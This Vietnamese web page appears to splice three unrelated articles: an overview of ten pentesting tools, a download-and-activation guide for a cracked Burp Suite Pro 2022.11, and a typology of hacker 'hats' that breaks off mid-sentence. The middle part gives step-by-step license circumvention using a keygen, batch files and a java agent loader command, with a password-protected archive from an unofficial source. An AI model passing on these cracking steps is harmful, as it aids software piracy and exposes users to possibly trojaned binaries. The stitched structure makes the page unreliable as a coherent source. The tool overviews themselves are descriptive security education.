Khi bạn bắt đầu học cách sử dụng các công cụ để thực hiện pentest, thì mình sẽ liệt kê ra danh sách những công cụ mà bạn sẽ phải sử dụng thường xuyên trong quá trình pentest. Trước khi chúng ta bắt đầu, mình đã nhận được một số lời khuyên tuyệt vời từ nhà phát triển Parrot và Pwnbox, Lorenzo “Palinuro” Faletra cho những người chơi pentesters mới:

“Khi bạn mới làm quen với Linux và bạn khám phá ra command line và các khả năng mạnh mẽ mà nó có, thì bạn sẽ muốn biết thêm về nó. Và vì bước đầu tiên là học các lệnh cơ bản, nên bước tiếp theo là biết thêm các lệnh để làm được nhiều việc hơn, nhưng thực tế lại hoàn toàn khác. Khi bạn học một vài lệnh shell để di chuyển, sao chép hoặc xóa tệp, đọc nội dung của chúng,…, bước tiếp theo không phải là tìm hiểu thêm các lệnh, mà thay vào đó là tìm hiểu cách hoạt động của Linux. Tại sao mọi thứ được coi là một tệp trong hệ thống Linux? Quyền đối với tệp hoạt động như thế nào? Pipelines là gì và làm thế nào để sử dụng chúng? Lập trình bằng Bash như thế nào?

Các lệnh mới sẽ được học trong khi bạn học những điều đó. Bây giờ bạn không nên tìm hiểu grep là gì hoặc tr làm gì. Nó sẽ chỉ làm lãng phí thời gian. Nhưng bạn sẽ tự nhiên biết về chúng và có thể sử dụng chúng đúng cách khi bạn tìm hiểu thêm về các pipelines UNIX. Bạn có học Regex không? Chào mừng đến với sed. Bạn có nghiên cứu về mạng Linux và cách cấu hình kết nối mạng theo cách thủ công không? Hãy tìm hiểu ifconfig, iwconfig, netstat và ip.

Sẽ không có ý nghĩa gì khi biết rằng chown và chmod thậm chí còn tồn tại nếu bạn không biết các quyền của Linux, và không thể không biết chúng nếu không có các nghiên cứu thích hợp. Điều tương tự cũng xảy ra với các công cụ kiểm tra thâm nhập. Tôi là người sáng lập Dự án Parrot, và hệ thống của riêng tôi chứa đầy những công cụ mà tôi chưa bao giờ sử dụng hoặc nghe nói đến. Tôi là một người kiểm tra thâm nhập và một sysadmin và tôi biết các công cụ mà tôi sử dụng tại nơi làm việc hoặc tôi đang làm việc, tất cả đều dựa trên nhu cầu và kiến ​​thức lý thuyết của tôi về lĩnh vực này.

Tôi biết Wireshark, Bettercap, Nmap và Metasploit vì tôi cần chúng và chúng là giải pháp hoàn hảo cho các vấn đề của tôi. Và bởi vì tôi đã gặp chúng khi tôi đang nghiên cứu về việc lập bản đồ cổng, đánh hơi và khai thác mạng. Và ngay cả khi tôi sử dụng chúng, chúng có một số tính năng mà tôi không biết (đặc biệt là Metasploit). Tôi tin rằng tôi thậm chí sẽ không thành công trong lĩnh vực an ninh mạng nếu tôi đã học về các công cụ như vậy, bởi vì chúng được liệt kê trong danh sách toàn diện nhất về các công cụ pentest. Vấn đề là, là một người mới bắt đầu, bạn không thể thực sự biết những gì cần thiết và những gì không, trừ khi bạn đã nắm vững một chủ đề. Đây là lý do tại sao xây dựng bộ kỹ năng thực hành của bạn thông qua lý thuyết luôn là chiến lược tốt nhất. Không có ‘Nmap’ nào có trong danh sách các công cụ sẽ khiến bạn trở thành vua quét cổng. Chỉ một số khóa học mạng tốt mới có.

Nghiên cứu lý thuyết thích hợp đằng sau một chủ đề giống như vẽ bản đồ của một vùng đất chưa biết. Sẽ dễ dàng hơn để xác định công cụ, lệnh, kỹ thuật, hack khi bạn biết chúng phù hợp với mục đích của bạn. Bạn có xu hướng tin rằng biết càng nhiều thì càng tốt, bởi vì bạn càng nhớ được tên nhiều công cụ, bạn càng cảm thấy được mình giỏi. Khi bạn phát triển và xây dựng bộ kỹ năng của mình, xu hướng ngược lại sẽ xuất hiện và khi bạn lớn tuổi hơn, bạn sẽ bắt đầu hiểu tại sao ít hơn là tốt hơn. ”

10 công cụ Pentesting mà mọi hacker đều cần

Firefox/Chrome

Nếu bạn hỏi bất kỳ người đội đỏ (red team) có kinh nghiệm nào, họ có thể sẽ cho bạn biết việc họ thực sự sử dụng một trò khai thác là hiếm như thế nào. Hầu hết họ đều bắt đầu bằng việc sử dụng trình duyệt để thực hiện một số OSINT để tạo danh sách tên người dùng, và sau đó cố gắng đăng nhập thủ công bằng một vài mật khẩu phổ biến như Summer2021!. Sau đó, sử dụng tài khoản này để thu thập được càng nhiều thông tin về mục tiêu càng tốt. Không chỉ các email của người dùng đó bị lộ mà người dùng đó cũng có thể có quyền truy cập vào nhiều tài nguyên đám mây như Wiki’s, Sharepoint, Confluence, Helpdesks,… Nếu không có trình duyệt web, bạn sẽ không thể truy cập tất cả các thông tin này.

Ngoài ra, khi nói đến việc viết báo cáo, đôi khi những kẻ lừa đảo sẽ lấy những gì họ đã làm trong các công cụ như “BurpSuite” và tạo lại cuộc tấn công trong Firefox hoặc Chrome bằng cách sử dụng “Developer Tools”. Nghe có vẻ hơi kỳ nhưng bằng cách thực hiện các cuộc tấn công mà không cần sử dụng các công cụ của bên thứ ba sẽ giúp cuộc tấn công đơn giản và thực tế hơn. Ngoài ra, nó còn cho ta biết thêm về “mối đe dọa nội bộ” và tầm quan trọng của việc ghi nhật ký tập trung.

Metasploit

Metasploit Framework là một nền tảng pentesting mạng, được phát triển bởi Rapid7. Hiện nó là một trong những ứng dụng pentesting mạng phổ biến nhất. Với phần mềm này, bạn có thể kiểm tra các mạng để xem việc khai thác cụ thể có thành công hay không. Những người pentesting mạng cần biết liệu các mạng có dễ bị tấn công bởi các hành vi khai thác phổ biến hay không. Hiện có một số lượng lớn các công cụ khai thác trong bộ sưu tập của Metasploit, với các công cụ mới được thêm vào thường xuyên.

Một số tính năng phổ biến nhất của Metasploit:

• Một số lượng lớn công cụ khai thác
• Payloads nâng cao
• Chức năng phụ trợ
• Bộ mã hóa
• Listeners
• Mô-đun khai thác giao thức Post
• Shellcodes

Có một câu thần chú tiêu cực chống lại việc sử dụng Metasploit, vì nó có thể khiến mọi thứ trở nên quá dễ dàng. Tuy nhiên, vì đây là một dự án lớn nên mỗi mô-đun khai thác phải thực hiện nhiều thử nghiệm hơn để đảm bảo nó đáng tin cậy. Trong Dante, có một máy chủ dễ bị tấn công bởi Eternal Blue, nhiều người sử dụng tập lệnh python trên github để khai thác nó, điều này khiến họ nhận được một shell nhưng cũng có khả năng cao bị lỗi dịch vụ, điều này sẽ gây thiệt hại trong môi trường chuyên nghiệp. Mô-đun Metasploit rất hiếm khi xảy ra sự cố dịch vụ.

Bettercap

Nếu bạn đang pentesting các mạng không dây, chẳng hạn như WiFi, Bluetooth hoặc thiết bị HID không dây, Bettercap là một công cụ rất hữu ích.

Bettercap được phát triển bởi một người đàn ông theo Evilsocket. Dưới đây là một số tính năng tốt nhất của Bettercap:

• Quét cổng siêu nhanh
• Mô phỏng các cuộc tấn công man-in-the-middle trên các mạng không dây để thu thập thông tin xác thực và fuzzing giao thức mạng
• ARP, DHCPv6, NDP và giả mạo DNS để tạo điều kiện cho các cuộc tấn công trung gian
• Quét mạng WiFi với chụp handshake WPA/WPA2
• Hỗ trợ API REST
• MouseJacking thông qua công nghệ HID
• Thăm dò và trinh sát máy chủ lưu trữ mạng IP thụ động và chủ động

Rất nhiều thiết bị có thể được kiểm tra với Bettercap, chẳng hạn như routers không dây, thiết bị đầu vào không dây như chuột và bàn phím, thiết bị và mạng Bluetooth.

Burp Suite

Burp Suite được phát triển bởi PortSwigger. Đây là một công cụ dựa trên proxy được sử dụng để đánh giá tính bảo mật của các ứng dụng dựa trên web. Các phiên bản trả phí có nhiều tính năng hơn, nhưng phiên bản Cộng đồng đã có một số tính năng khá mạnh mẽ, bao gồm:

• Bản demo của Burp Intruder (để tự động hóa các cuộc tấn công tùy chỉnh chống lại các ứng dụng web)
• Lịch sử và proxy HTTP, HTTPS và WebSockets
• Bộ lặp, bộ giải mã, bộ tuần tự và bộ so sánh

Làm quen với các ứng dụng của Burp Suite sẽ giúp bạn trong hành trình pentesting web của mình.

Nmap

Nmap là công cụ phổ biến nhất trong danh sách này. Tên của nó chỉ đơn giản có nghĩa là “network mapper” và đó là những gì nó làm. Với Nmap, bạn có thể khám phá đầy đủ cơ sở hạ tầng mạng, máy chủ, điểm cuối và cách mọi thứ được kết nối. Đó là thông tin cần thiết nếu bạn định pentest mạng. Ngay cả các quản trị viên mạng cũng sử dụng Nmap để kiểm kê mạng của chính họ, đây thường là một nhiệm vụ khó khăn.

Dưới đây là một số tính năng đáng chú ý nhất của Nmap:

• Quét mạng từ mạng LAN nhỏ với một vài thiết bị đến các mạng lớn với hàng trăm nghìn thiết bị
• Nmap có thể được vận hành từ dòng lệnh hoặc GUI theo sở thích cá nhân của bạn
• Vì Nmap rất phổ biến nên có nhiều tài liệu hướng dẫn về nó
• Thiết bị mạng fingerprint cho máy chủ, dịch vụ và hệ điều hành
• Khám phá các loại tường lửa và lọc gói mà mạng có

Tất cả các pentesters mạng đều phải sử dụng Nmap. Bạn có thể xem qua khóa học Enumeration Network với Nmap để tìm hiểu cách thực sự thành thạo nó.

Wireshark

Wireshark là một trình phân tích gói. Thông thường, pentesters sẽ chuyển đổi qua lại giữa Nmap và Wireshark. Nmap để xem mạng, sau đó Wireshark để xem dữ liệu trong mạng. Nhưng chúng là các ứng dụng hoàn toàn riêng biệt và Wireshark chắc chắn có thể được sử dụng riêng nếu bạn không cần thực hiện bất kỳ ánh xạ (mapping ) mạng nào cho một tác vụ cụ thể.

Tất cả dữ liệu được gửi qua mạng đều được gửi dưới dạng gói TCP hoặc UDP. Nếu các gói này không được mã hóa theo một cách nào đó hoặc nếu mã hóa bị bẻ khóa hoặc bị bypass, thì việc phân tích gói sẽ rất dễ dàng. Nhưng Wireshark cũng có khả năng giải mã mạng nếu bạn đang thử nghiệm các mạng được mã hóa. Dưới đây là một số tính năng của nó:

• Chụp gói (pcap)
• Cả chụp trực tiếp và phân tích ngoại tuyến
• Sử dụng GUI hoặc TShark để duyệt dữ liệu mạng đã chụp
• Kiểm tra sâu hàng trăm giao thức
• Hỗ trợ giải mã cho IPsec, ISAKMP, Kerberos, SNMPv3, SSL / TLS, WEP và WPA / WPA2

Hashcat

Hashcat là một công cụ khôi phục mật khẩu mạnh mẽ. Nó có thể sớm trở thành công cụ yêu thích của bạn để bẻ khóa nhiều loại mật khẩu và được phát triển bởi Jens ‘atom’ Steube và ‘matrix’ Gabriele Gristina. Dưới đây là một số tính năng của nó:

• Tấn công Brute force, tổ hợp, từ điển và mật khẩu dựa trên quy tắc
• Crack nhiều mã băm đồng thời
• Hỗ trợ phiên
• Hỗ trợ mạng bẻ khóa phân tán
• Hỗ trợ hex-salt và hex-charset
• Hoạt động với hơn 350 kiểu băm
• Tạm dừng và tiếp tục bẻ khóa mật khẩu bất cứ khi nào bạn cần

Bẻ khoá mật khẩu là công việc đòi hỏi nhiều sức mạnh của CPU, nhưng Hashcat hoàn thành tốt nhiệm vụ này. Bạn có thể xem khóa học Cracking mật khẩu với Hashcat của HTB nếu bạn muốn thực sự thành thạo công cụ mạnh mẽ này.

Impacket

Linux thường là hệ điều hành được lựa chọn để kiểm tra thâm nhập. Ngoài ra, Linux không tương thích với nhiều giao thức được sử dụng trong Môi trường Windows. Đó là lý do impacket xuất hiện vì nó là một thư viện python cho phép tin tặc sử dụng các giao thức này theo cách mà chúng muốn. Ví dụ, một trong những cuộc tấn công lâu đời nhất trên Windows là cuộc tấn công “Pass The Hash”, cho phép kẻ tấn công xác thực bằng mã băm mật khẩu thay vì mật khẩu thực. Windows không có giao diện người dùng để thực hiện loại xác thực này, tuy nhiên, vì impacket chỉ là một thư viện python nên tin tặc đã khai thác phương thức xác thực này.

Một số công cụ impacket phổ biến nhất:

• psexec: Đây là một bản sao của Gói Sysinternals PSExec và cung cấp một cách xác thực dựa trên remote windows và lấy lại command prompt.
• wmiexec: Giống như psexec nhưng thay vì sử dụng phương pháp mà psexec thực hiện (thả một tệp vào đĩa, sau đó tạo một dịch vụ để thực thi nó), nó sẽ sử dụng WMI để chạy các lệnh trực tiếp trên máy. PSexec thường bị phần mềm chống virus quét nhưng WMI không “đụng vào ổ đĩa”, vì vậy nhiều AV sẽ bỏ qua nó.
• secretdump: Bạn có thông tin đăng nhập quản trị viên domain ? Công cụ này sẽ loại bỏ mọi mật khẩu ra khỏi Active Directory!
• GetNPUsers: Bạn đã bao giờ nghe về Kerberoasting? Nếu người dùng có thuộc tính Active Directory: “Do not require Kerberos preauthentication”. Thao tác này sẽ trích xuất một hàm băm mật khẩu mà mọi người có thể bẻ khóa bằng Hashcat.
• ntlmrelayx: Công cụ này cho phép người dùng thực hiện các cuộc tấn công NTLM Relay chống lại các máy chủ chưa bật SMB Signing. Về cơ bản, người dùng buộc một máy chủ có “đặc quyền cao” như Domain Controller kết nối lại (PetitPotam, Máy in,…), sau đó chuyển tiếp kết nối đó đến một máy trạm khác và tham gia vào phiên làm việc.

Tất cả các công cụ trên đều hoạt động tuyệt vời. Tuy nhiên, như mình đã nói trước đó Impacket là một thư viện python và các hacker có kinh nghiệm luôn chỉnh sửa nó để làm được nhiều việc hơn.

BloodHound

Nếu bạn đang pentesting các mạng Windows, hãy dùng thử BloodHound. Các mạng có máy chủ và máy khách Windows sử dụng Active Directory để quản trị và đó là những gì BloodHound tập trung vào. Vì vậy, công cụ này sẽ giúp ích rất nhiều nếu bạn cần thâm nhập đúng vào mạng Windows thông qua Active Directory.

Dưới đây là những gì Bloodhound có thể làm:

• Khám phá kỹ lưỡng các ACL (danh sách kiểm soát truy cập), được Active Directory sử dụng để quản lý các đặc quyền của tài khoản người dùng
• Nhận thông tin cấu hình Active Directory có thể giúp báo cáo đặc quyền
• Xuất ra thông tin trực quan của mạng với Active Directory để khám phá các mối quan hệ, kết nối và quản trị viên domain Active Directory

Các mạng Windows có Active Directory rất phổ biến, vì vậy Bloodhood là một công cụ rất hữu ích để kiểm tra tính bảo mật của chúng. Và nếu bạn thực sự muốn khai thác tối đa BloodHound, hãy xem khóa học Active Directory BloodHound.

Responder

Cuối cùng nhưng không kém phần quan trọng, một trong những công cụ được sử dụng nhiều nhất cho các cuộc tấn công liên quan đến Link Local Multicast Name Resolution (LLMNR), NBT-NS và đầu độc MDNS có thể được sử dụng trong mọi hoạt động thử nghiệm thâm nhập cơ sở hạ tầng là công cụ Responder. Nó vẫn được người sáng tạo Laurent Gaffie tích cực duy trì và được coi là một trong những phương pháp dễ dàng nhất để Red Team có được thông tin đăng nhập cả ở dạng văn bản thuần hoặc được băm bằng mật khẩu và có thể là một trong những cách nhanh nhất để truy cập quản trị viên Domain. Responder mô phỏng các dịch vụ khác nhau và cung cấp chúng cho mạng khiến máy Windows cố gắng giao tiếp nhầm với các máy chủ giả mạo để làm lộ mật khẩu được băm hợp lệ. Nó cũng có thể chụp các thông tin xác thực và do đó có thể nắm bắt chúng ở định dạng văn bản thuần hoặc trong nhiều trường hợp tự động sử dụng mật khẩu băm theo kiểu tấn công pass-the-hash để đăng nhập vào các hệ thống hợp pháp.

Một số tính năng tốt nhất của nó bao gồm:

• Máy chủ xác thực tích hợp như SMB, MSSQL, HTTP / HTTPS, LDAP, FTP, POP3, v.v.
• Chuyển hướng Icmp
• Lỗi DHCP
• Chế độ phân tích
• Lấy dấu vân tay
• Trình nghe trình duyệt

Ngoài ra, bạn cũng có thể xem lộ trình để trở thành pentester Website tại đây.

Câu hỏi thường gặp

Pwnbox và Parrot OS là gì và tại sao chúng lại hữu ích trong pentesting?

Pwnbox là một môi trường pentesting dựa trên nền tảng Hack The Box, cung cấp các công cụ sẵn sàng sử dụng. Parrot OS là một hệ điều hành Linux được thiết kế đặc biệt cho pentesting, cho phép bạn cài đặt và quản lý các công cụ một cách hiệu quả trên máy tính cá nhân.

Tôi nên bắt đầu học pentesting bằng cách nào?

Tập trung vào việc hiểu các nguyên lý cơ bản của hệ thống Linux và mạng máy tính trước khi tìm hiểu các công cụ cụ thể. Xây dựng nền tảng lý thuyết vững chắc sẽ giúp bạn sử dụng các công cụ một cách hiệu quả và chính xác hơn.

Metasploit có thực sự cần thiết cho người mới bắt đầu học pentesting không?

Mặc dù Metasploit là một công cụ mạnh mẽ, nhưng việc hiểu rõ các nguyên lý hoạt động của nó đòi hỏi kiến thức nền tảng vững chắc. Tập trung vào việc học các khái niệm cơ bản trước khi sử dụng các công cụ phức tạp như Metasploit sẽ giúp bạn có được kết quả tốt hơn.

Burp Suite 2022.11 Pro Full (viết tắt là Burp) là công cụ tích hợp nổi tiếng và phổ biến, được sử dụng để thực hiện các bài kiểm tra thâm nhập bảo mật cho các ứng dụng web. Thực ra nó được sử dụng phổ biến hơn cho các hoạt động hack Website. Phần mềm được viết bằng Java, được phát triển bởi PortSwigger từ Anh.

Burp Suite 2022.11 Pro Full Key cung cấp cho bạn một phương tiện đơn giản để thực hiện kiểm tra bảo mật Website. Nó cung cấp cho bạn toàn quyền kiểm soát, cho phép bạn kết hợp các kỹ thuật thủ công nâng cao phối hợp với nhiều công cụ kiểm thử khác cho quá trình kiểm thử.

Burp Suite 2012.12 Crack bao gồm một số công cụ để tấn công mạng và nhiều giao diện đã được thiết kế cho các công cụ này, nhằm tạo điều kiện và tăng tốc quá trình tấn công các ứng dụng. Công cụ giúp phân tích các thông tin của: HTTP messages, persistence, certification, proxy, log, alert,, v.v. Các chức năng đa dạng của nó có thể giúp chúng ta thực hiện các tác vụ khác nhau, bao gồm chặn và sửa đổi các yêu cầu mạng, quét lỗ hổng của các ứng dụng web, bẻ khóa đăng nhập với brute force, session, token và kiểm tra ngẫu nhiên khác.

Tóm lại, là một trong những công cụ tốt nhất để kiểm tra bảo mật Website. Burp Suite hơi khó sử dụng, đặc biệt là với các tham số phức tạp của nó. Nhưng một khi bạn hiểu rõ về cách sử dụng của nó, đây sẽ là công cụ đắc lực cho Hacker.

Các tính năng

Cách cài đặt và Active Burp Suite 2022.11 Pro Full Key

Do Burp Suite 2022.11 Pro chạy trên nền Java, nên bạn cần cài Java trước, tải trọn bộ cài đặt ở Link bên dưới:

Download Burp Suite 2022.11 Pro Full Key

(Password: anonyviet.com)

Bước 1: Cài JAVA trên Windows

Bước 2: Chạy File reset_license.bat nếu trên máy tính đã cài Burp Suite rồi.

Bước 3: Chạy File step1.bat, sau đó uncheck “help improve burp by …” và chọn “I Accept”

Bước 4: Chạy File step2.bat

Bước 5: nhấn RUN để mở Burp

Bước 6: Copy License -> Next -> Copy Code qua lại BurpLoaderKeygen để Get Key, Copy Key qua lại để Active

Bước 7: burpsuite_pro_v2022.11 để Active Key (chi tiết xem hình bên dưới)

Chọn Manual activation

Click “Copy request“, and dán lại vào mục “Activation Request của Loader

Copy dòng “Activation Response” vào lại Manual Activation, click “Paste response“, và click “Next”

Sau sẽ xuất hiện thông báo Active Burp Suite thành công.

Sửa lỗi Burp suite không mở được:

Mở CMD trỏ về thư mục vừa tải về đã giải nén

Nhập lệnh vào CMD:
java --illegal-access=permit -Dfile.encoding=utf-8 -javaagent:BurpSuiteLoader_v2022.11.jar -noverify -jar burpsuite_pro_v2022.11.jar

Chờ đến khi xuất hiện cửa sổ Enter License Key

Vậy là bạn đã kích hoạt thành công Burp Suite 2022.11 mới nhất.

Câu hỏi thường gặp

Burp Suite có yêu cầu cấu hình máy tính cụ thể nào không?

Burp Suite chạy trên nền Java, vì vậy máy tính của bạn cần cài đặt Java trước. Các yêu cầu cấu hình cụ thể khác phụ thuộc vào phiên bản Burp Suite và tính năng bạn sử dụng. Tham khảo trang chủ PortSwigger để biết thông tin chi tiết.

Tôi có thể sử dụng Burp Suite cho mục đích cá nhân không?

Việc sử dụng Burp Suite phụ thuộc vào mục đích và tuân thủ các điều khoản sử dụng của nhà phát triển. Hãy đảm bảo sử dụng công cụ này một cách có trách nhiệm và tuân thủ pháp luật.

Nếu gặp sự cố trong quá trình cài đặt và kích hoạt, tôi nên làm gì?

Hãy kiểm tra lại từng bước hướng dẫn cài đặt và kích hoạt một cách cẩn thận. Nếu vẫn gặp sự cố, hãy tìm kiếm câu trả lời trên diễn đàn hỗ trợ của PortSwigger hoặc các cộng đồng liên quan đến bảo mật.

Hacking là quá trình xác định và khai thác điểm yếu trong hệ thống mạng để truy cập trái phép vào dữ liệu và tài nguyên hệ thống.

Nó cũng có thể được định nghĩa là sự xâm nhập trái phép vào hệ thống thông tin bằng lỗ hổng bảo mật.

Ví dụ về Hacking: Khai thác điểm yếu của mật khẩu mặc định để truy cập vào Camera/Router

Ethical Hacking là gì?

Ethical Hacking – Hack có đạo đức đôi khi được gọi là Kiểm tra thâm nhập (Pentest) là một hành động xâm nhập vào hệ thống hoặc mạng để tìm ra các mối lỗ hổng trong hệ thống mà “Hacker xấu” có thể tìm thấy và khai thác gây mất dữ liệu, tổn thất tài chính hoặc các thiệt hại lớn khác.

Mục đích của Ethical Hacking là cải thiện tính bảo mật của mạng hoặc hệ thống bằng cách sửa các lỗ hổng được tìm thấy. Hacker có “đạo đức” có thể sử dụng các phương pháp và công cụ giống như các Hacker “xấu” đã sử dụng nhưng được sự cho phép của người quản lý hệ thôsng nhằm mục đích cải thiện bảo mật và bảo vệ hệ thống khỏi các cuộc tấn công từ Hacker khác

Các Hacker có đạo đức sẽ báo cáo tất cả các lỗ hổng và điểm yếu được tìm thấy trong quá trình này cho người quản lý hệ thống.

Ethical Hacker à ai?

Một Ethical Hacker hay Hacker có Đạo đức là một chuyên gia có kiến ​​thức và kỹ năng về bảo mật, đồng thời biết cách xác định và khai thác các lỗ hổng trong các hệ thống mục tiêu. Ethical Hacker làm việc với sự cho phép của chủ sở hữu hệ thống. Một Ethical Hacker phải tuân thủ các quy tắc của tổ chức hoặc chủ sở hữu mục tiêu và luật pháp của đất nước và mục đích của họ là đánh giá tình hình an ninh của một tổ chức/hệ thống mục tiêu.

Có bao nhiêu loại Hacker và mục đích

Hacker có thể là đứa trẻ 10 tuổi, có thể một sinh viên, một cụ già và Hacker nữ cũng có rất nhiều trên Internet. Tuy nhiền tùy vào mục đích, chúng ta có thể chia thành các nhóm Hacker như sau:

1. Hacker Mũ đen: Hacker tội phạm

Hacker mũ đen (Blackhat) là tội phạm mạng đột nhập vào hệ thống máy tính với mục đích xấu hoặc tội phạm. Hacker mũ đen có lẽ là những gì bạn nghĩ đến khi hình dung về một Hacker hoặc tội phạm mạng thường thấy trên báo, đài. Họ cố gắng tìm ra các lỗ hổng trong hệ thống máy tính và phần mềm để thu lợi bất chính hoặc các mục đích xấu khác.

Những cá nhân này có thể gây tổn hại nghiêm trọng cho các cá nhân và tổ chức như nhau bằng cách đánh cắp dữ liệu cá nhân hoặc nhạy cảm, làm tổn hại toàn bộ hệ thống máy tính hoặc thay đổi các mạng quan trọng.

Động cơ : Để kiếm lợi từ việc bán dữ liệu, tống tiền, phá hoại hoặc đánh bóng bản thân.

Ai có nguy cơ cao nhất? Hacker mũ đen gây ra nhiều rủi ro nhất cho các doanh nghiệp mà chúng thường nhắm mục tiêu để đánh cắp dữ liệu nhạy cảm như thông tin tài chính công ty, thông tin nhân sự, khách hàng tổn hại đến uy tín của doanh nghiệp đó

2. Hacker Mũ trắng: Hacker được ủy quyền

Tương tự như hacker mũ đen, hacker mũ trắng là những chuyên gia an ninh mạng sử dụng kỹ năng của họ để tìm ra lỗ hổng trong mạng tổ chức và hệ thống máy tính. Tuy nhiên, điểm khác biệt chính là các hacker mũ trắng được phép hack các hệ thống này với mục đích phát hiện các lỗ hổng bảo mật trước khi một hacker tội phạm có thể tìm ra.

Thường được thuê bởi chính phủ hoặc các doanh nghiệp lớn, Hacker mũ trắng xác định và hướng dẫn sửa chữa các lỗ hổng hoặc điểm yếu được tìm thấy trong hệ thống bảo mật của tổ chức để giúp ngăn chặn một cuộc tấn công bên ngoài.

Động cơ: Giúp các doanh nghiệp ngăn chặn các cuộc tấn công an ninh mạng

3. Hacker Mũ xám: Hacker “Chỉ để giải trí”

Hacker mũ xám là một chuyên gia an ninh mạng, người tìm mọi cách để xâm nhập vào hệ thống và mạng máy tính, nhưng không có mục đích xấu của hacker mũ đen.

Thông thường, chúng tham gia vào các hoạt động hack vì mục đích thuần túy là tìm ra lỗ hổng trong hệ thống máy tính và thậm chí chúng có thể cho chủ sở hữu biết nếu tìm thấy bất kỳ điểm yếu nào. Tuy nhiên, không phải lúc nào chúng cũng đi theo con đường “thánh thiện “nhất khi sử dụng các hoạt động hack – họ có thể xâm nhập vào hệ thống hoặc mạng mà không có sự cho phép của chủ sở hữu (mặc dù chúng không cố gắng gây ra bất kỳ tổn hại nào).

Động cơ: Hưởng thụ cá nhân

Ai có nguy cơ cao nhất? Bất kỳ ai không muốn truy cập trái phép vào hệ thống và mạng của họ

4. Script Kiddies: Những đứa trẻ chỉ gì làm đó

Script kiddies là không hẵn là Hacker hoặc có thể gọi là Hacker nghiệp dư do  không có trình độ, kỹ năng chuyên môn như những Hacker chuyên nghiệp. Các Script Kiddies chủ yếu là xem các hướng dẫn trên mạng rồi làm theo chứ không hiểu rõ nguyên lý hoạt động như thế nào. Đa số Script Kiddies sử dụng phần mềm độc hại hiện có do các Hacker khác tạo ra để thực hiện các cuộc tấn công mạng hoặc dùng những công cụ DDoS được chia sẻ trên Internet.

Động cơ: Gây gián đoạn tạm thời

Ai có nguy cơ cao nhất? Các tổ chức có hệ thống và mạng không an toàn

5. Hacker Mũ xanh lá: Đào tạo Hacker

Hacker mũ xanh lá là một người mới tham gia vào thế giới hack nhưng đang chăm chú tập trung vào việc nâng cao kỹ năng tấn công mạng của họ. Họ chủ yếu tập trung vào việc đạt được kiến ​​thức về cách thực hiện các cuộc tấn công mạng ở cấp độ tương tự như các Hacker mũ đen. Mục đích chính của họ là cuối cùng phát triển thành một hacker chính thức, vì vậy họ dành thời gian tìm kiếm cơ hội học hỏi từ những hacker có kinh nghiệm hơn.

Động cơ : Để học cách trở thành một hacker có kinh nghiệm

Ai có nguy cơ cao nhất? Chưa có ai

6. Hacker Mũ xanh lá dương: Hacker phần mềm được ủy quyền

Hacker mũ xanh dương được các tổ chức thuê để kiểm tra lỗi một phần mềm hoặc mạng hệ thống mới trước khi nó được phát hành. Vai trò của họ là tìm ra các sơ hở hoặc lỗ hổng bảo mật trong phần mềm mới và khắc phục chúng trước khi nó ra mắt.

Động cơ : Để xác định các lỗ hổng trong phần mềm tổ chức mới trước khi nó được phát hành

7. Hacker Mũ đỏ: Hacker do chính phủ thuê

Hacker mũ đỏ được các cơ quan chính phủ thuê để phát hiện các lỗ hổng trong hệ thống bảo mật, với trọng tâm cụ thể là tìm kiếm và giải giáp đối trọng lại các Hacker mũ đen. Họ được biết đến là đặc biệt “tàn nhẫn” trong việc săn lùng các Hacker mũ đen và thường sử dụng mọi cách có thể để hạ gục chúng. Điều này thường giống như sử dụng chiến thuật tương tự như Hacker mũ đen và sử dụng chúng để chống lại chúng – sử dụng cùng một phần mềm độc hại, vi rút và các chiến lược khác để xâm nhập máy của họ từ trong ra ngoài.

Động cơ : Để tìm và tiêu diệt Hacker mũ đen

Ai có nguy cơ cao nhất? Hacker mũ đen

8. Hacker được Nhà nước bảo trợ: Phòng chống mối đe dọa quốc tế

Hacker này được chính phủ của một quốc gia chỉ định để truy cập vào hệ thống máy tính của quốc gia khác. Các kỹ năng an ninh mạng của họ được sử dụng để lấy thông tin bí mật từ các quốc gia khác để chuẩn bị cho một cuộc tấn công tiềm tàng sắp tới, cũng như để nắm bắt các tình huống nhạy cảm có thể gây ra mối đe dọa trong tương lai. Những Hacker này chỉ được thuê bởi các cơ quan chính phủ.

Động cơ : Để giám sát và ngăn chặn các mối đe dọa quốc tế

Ai có nguy cơ cao nhất? Hacker và tội phạm quốc tế

9. Hacker Nội gián

Hacker nội gián là những cá nhân tạo ra một cuộc tấn công mạng từ bên trong tổ chức mà họ làm việc. Động cơ tấn công của họ có thể khác nhau, từ hành động dựa trên mối hận thù cá nhân mà họ có đối với người mà họ làm việc cho đến việc tìm kiếm và vạch trần hoạt động bất hợp pháp trong tổ chức. Hoặc được công ty đối thủ cài người vào nhằm phá hoại hệ thống.

Động cơ : Để lộ hoặc khai thác thông tin bí mật của một tổ chức

Ai có nguy cơ cao nhất? Giám đốc điều hành nội bộ và lãnh đạo doanh nghiệp

10. Hacker có động cơ chính trị

Hacker có động cơ chính trị – Hacktivist là người đột nhập vào các mạng và hệ thống của chính phủ để tạo ra sự chú ý một mục đích chính trị hoặc xã hội – do đó tại sao cái tên “hacktivist” là một cách chơi chữ của từ “activist” – “nhà hoạt động”.  Họ sử dụng hack như một hình thức phản đối, lấy thông tin nhạy cảm của chính phủ, được sử dụng cho các mục đích chính trị hoặc xã hội. Các nhóm hacktivist thường thấy đó là Anonymous, WikiLeaks ..

Động cơ: Để làm sáng tỏ một nguyên nhân xã hội hoặc chính trị hoặc để đưa ra một tuyên bố chính trị hoặc ý thức hệ)

Ai có nguy cơ cao nhất? Cơ quan chính phủ

11. Hacker ưu tú: Những Hacker cao cấp nhất

Hacker tinh nhuệ – Elite Hacker là người nổi tiếng trong thế giới tội phạm mạng, và được coi là những Hacker có kỹ năng cao trong lĩnh vực an ninh mạng. Họ thường là những người đầu tiên phát hiện ra các phương pháp tấn công zero-day và được biết đến là những chuyên gia trong thế giới hacker.

Động cơ : Để thực hiện các cuộc tấn công mạng zero-day vào các tổ chức và cá nhân

Ai có nguy cơ cao nhất? Các công ty có doanh thu cao

12. Cryptojacker: Hacker khai thác tiền điện tử

Cryptojacker được biết là khai thác các lỗ hổng mạng và đánh cắp tài nguyên máy tính như một cách để khai thác tiền điện tử. Chúng phát tán phần mềm độc hại theo nhiều cách khác nhau, thường bằng cách phát tán virus lây nhiễm trên web. Những loại virus và chiến thuật giống như ransomware này được sử dụng để cài mã độc vào hệ thống của nạn nhân, những hệ thống này hoạt động âm thầm trong nền mà nạn nhân không hề hay biết. Sau khi mã được cài đặt, nó sẽ gửi lại kết quả cho hacker.

